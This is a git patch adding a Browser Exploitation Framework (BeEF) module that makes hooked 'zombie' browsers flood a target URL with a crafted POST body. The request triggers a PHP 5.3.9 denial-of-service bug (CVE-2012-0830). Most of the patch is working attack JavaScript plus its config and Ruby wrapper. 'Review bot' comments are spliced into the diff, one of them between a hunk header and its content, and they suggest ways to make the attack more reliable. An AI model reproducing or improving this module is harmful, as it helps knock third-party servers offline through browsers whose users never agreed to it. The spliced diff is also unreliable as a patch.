From 75532ffe44efbc3235c4f6e6d953226edf82c073 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Thu, 29 Nov 2012 18:34:07 +1030
Subject: [PATCH] Add PHP 5.3.9 DoS (CVE-2012-0830) module

Has not been tested
---
 modules/exploits/php-5.3.9-dos/command.js | 52 ++++++++++++++++++++++
 modules/exploits/php-5.3.9-dos/config.yaml | 15 +++++++
 modules/exploits/php-5.3.9-dos/module.rb | 21 +++++++++
 3 files changed, 88 insertions(+)
 create mode 100644 modules/exploits/php-5.3.9-dos/command.js
 create mode 100644 modules/exploits/php-5.3.9-dos/config.yaml
 create mode 100644 modules/exploits/php-5.3.9-dos/module.rb
diff --git a/modules/exploits/php-5.3.9-dos/command.js b/modules/exploits/php-5.3.9-dos/command.js
new file mode 100644
index 000000000..6f03ea12f
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/command.js
@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
+// PoC written by Paul Westin
+// PoC ported to BeEF by bcoles
+// Bug discovered by Stefan Esser (@i0n1c)
+// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
+
+// Generate 1000 normal keys and one array
+function createEvilObj () {
+ var evil_obj = {};
+ for (var i = 0; i < 1001; i++) {
+ evil_obj[i] = 1;
+ }
+ evil_obj['kill[]'] = 'kill';
+ return evil_obj;
+}
+
+// Serialize Javascript object into POST data
+function serializeObj (obj) {
+ var str = [];
+ for(var p in obj) {
+ str.push(p + "=" + obj[p]);
+ }
+ return str.join("&");
+}
+
+// Run attack
+function attackSite (target_url) {
+ var bad = serializeObj(createEvilObj());
+ var xhr = new XMLHttpRequest();
+ xhr.open("POST", target_url, true);
+ xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
+ xhr.setRequestHeader('Content-Length', bad.length);
+ xhr.send(bad);
+}
+
+try {
+ attackSite("<%= @url %>");
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent");
+} catch (e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString());
+}
+
+});
+
diff --git a/modules/exploits/php-5.3.9-dos/config.yaml b/modules/exploits/php-5.3.9-dos/config.yaml
new file mode 100644
index 000000000..3617825ba
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/config.yaml
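Review bot: `xhr.setRequestHeader('Content-Length', bad.length);` in attackSite sets a header that XMLHttpRequest does not allow script to set — compliant browsers ignore the call and compute the length from the body themselves, and some older engines throw on it, which would route execution into the catch branch before `xhr.send` ever runs; the line can simply be dropped. The catch branch also concatenates `e.toString()` into the result string unencoded, so an error message containing `&` or `=` would split the `result` field when the hook server parses it; `"result=request failed&error=" + encodeURIComponent(e.toString())` keeps it intact. Separately, the comment above createEvilObj says "1000 normal keys" while `i < 1001` produces 1001 numeric keys (0 through 1000) plus the `kill[]` entry, so the comment should read `// Generate 1001 numeric keys plus one array-style key` or the bound should be changed to match it. Since `xhr.open(..., true)` is asynchronous, "result=request sent" is reported before the browser has transmitted anything, so that status presumably means "request queued" rather than delivered; wording it that way in the result string would avoid misleading the operator.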
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ php_dos:
+ enable: true
+ category: "Exploits"
+ name: "PHP 5.3.9 DoS"
+ description: "This module uses the zombie browser to exploit a denial of service bug in PHP 5.3.9 (CVE-2012-0830).

For more information, see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/."
+ authors: ["bcoles", "Paul Westin", "Stefan Esser"]
+ target:
+ unknown: ["ALL"]
diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb
new file mode 100644
index 000000000..6044f3550
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Php_dos < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'value' =>'http://example.com/index.php', 'width' => '400px', 'height' => '50px'}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+ end
+
+end
+
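Review bot: The `url` option declared in self.options is interpolated into command.js as `"<%= @url %>"` by ERB with no escaping, so a value containing a double quote or backslash breaks the generated script, and whatever the operator types in that textarea is emitted verbatim as script into the hooked browser; validate the value here (accept only an http/https URL) or JSON-encode it at the template so it always lands inside the string literal. post_execute copies `@datastore['result']` straight into the saved record without checking it is present; if the zombie never reports back this presumably saves a nil result, so either a guard such as `return if @datastore['result'].nil?` or a comment stating that nil is expected would make the intent clear — confirm against how `save` handles nil values. The explicit `return [` in self.options is redundant in Ruby, since the array literal is already the method's last expression.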